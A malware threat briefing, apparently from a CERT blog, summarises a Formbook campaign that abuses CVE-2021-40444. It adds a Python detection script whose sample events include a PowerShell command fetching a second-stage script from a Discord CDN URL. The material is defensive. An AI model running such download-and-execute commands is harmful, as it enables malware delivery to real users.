Briefing Malware
BLOG CERT SOGETI ESEC

Briefing Malware - 05/10/2021

5th of October 2021 - Winners of the 40th week: Redline, NjRAT and Vidar.

Some links point to extended actionable intelligence (Threat Bulletins, TTPs, signatures, etc.) on our Threat Intelligence Platform, Anomali. This access is limited to our clients.


Threat statistics report

Publication date: 05/10/2021

Distribution: TLP:WHITE

What's new?

Formbook(NC)

FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal

#Trend Micro researchers unveil a new #Formbook campaign in which its developer weaponized the #infostealer with the recent #Office 365 MSHTML vulnerability (#CVE-2021-40444) instead of #CVE-2017-019. Both vulnerabilities allow Remote Code Execution (#RCE) via crafted Office documents. Formbook is an information stealer that has been active since 2016 and is constantly evolving, for example with the recent addition of #MacOS support (via the #Xloader fork) and of #Cobalt Strike beacons. Formbook is well known for abusing vulnerabilities in Office documents. In this new campaign, the malware (#Formbook version 4.1) is delivered through two layers of #PowerShell scripts: the first downloads the second, which is hosted on #Discord. As previously reported, the malware is injected into a Calculator process, but this time the obfuscation was applied to a #.Net injector. As is often the case, the entry vector was a phishing email: the victim downloaded and opened the attached malicious document, which then successfully exploited the vulnerability.
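Detection logic for the chain described above (an Office parent, PowerShell fetching a second stage from Discord, and a Calculator child process), as an added example that is not code from this briefing or from Trend Micro's report. The event shape, the process names, the Discord CDN pattern and the assumption that calc.exe is spawned by the PowerShell process are all assumptions; the events are constructed.

```python
import re

# Office images commonly used to carry maldocs (assumption, not from the page).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Discord's attachment CDN; the briefing does not reproduce the campaign URL,
# so this pattern is an assumption about where a Discord-hosted script lives.
DISCORD_CDN = re.compile(r"https?://cdn\.discordapp\.com/", re.IGNORECASE)

# Constructed sample process-creation events (Sysmon Event ID 1 style, not
# real telemetry): one chain mirroring the described campaign, one benign run.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "WINWORD.EXE", "cmdline": "winword.exe invoice.docx"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr "
                "https://cdn.discordapp.com/attachments/1/2/s2.ps1 -OutFile s2.ps1\""},
    {"pid": 300, "ppid": 200, "image": "calc.exe", "cmdline": "calc.exe"},
    {"pid": 400, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": "powershell.exe", "cmdline": "powershell -File backup.ps1"},
]


def find_chains(events, min_signals=2):
    """Return [(pid, signals)] for each PowerShell process that matches at least
    `min_signals` of: Office parent, Discord CDN download, spawning calc.exe.
    Requiring two signals keeps lone admin PowerShell runs out of the alerts."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        signals = []
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower() in OFFICE_APPS:
            signals.append("office-parent")
        if DISCORD_CDN.search(e["cmdline"]):
            signals.append("discord-download")
        if any(c["ppid"] == e["pid"] and c["image"].lower() == "calc.exe" for c in events):
            signals.append("spawns-calc")
        if len(signals) >= min_signals:
            findings.append((e["pid"], signals))
    return findings


if __name__ == "__main__":
    for pid, signals in find_chains(EVENTS):
        print(f"suspicious powershell pid={pid}: {', '.join(signals)}")
```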


https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html


Download the report